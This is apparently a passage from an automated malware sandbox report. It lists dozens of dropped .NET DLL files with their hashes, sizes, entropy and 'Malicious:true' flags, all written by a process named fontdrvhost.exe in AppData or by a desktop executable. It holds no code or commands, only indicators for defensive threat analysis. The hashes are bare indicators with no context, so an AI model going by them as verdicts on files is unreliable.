                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
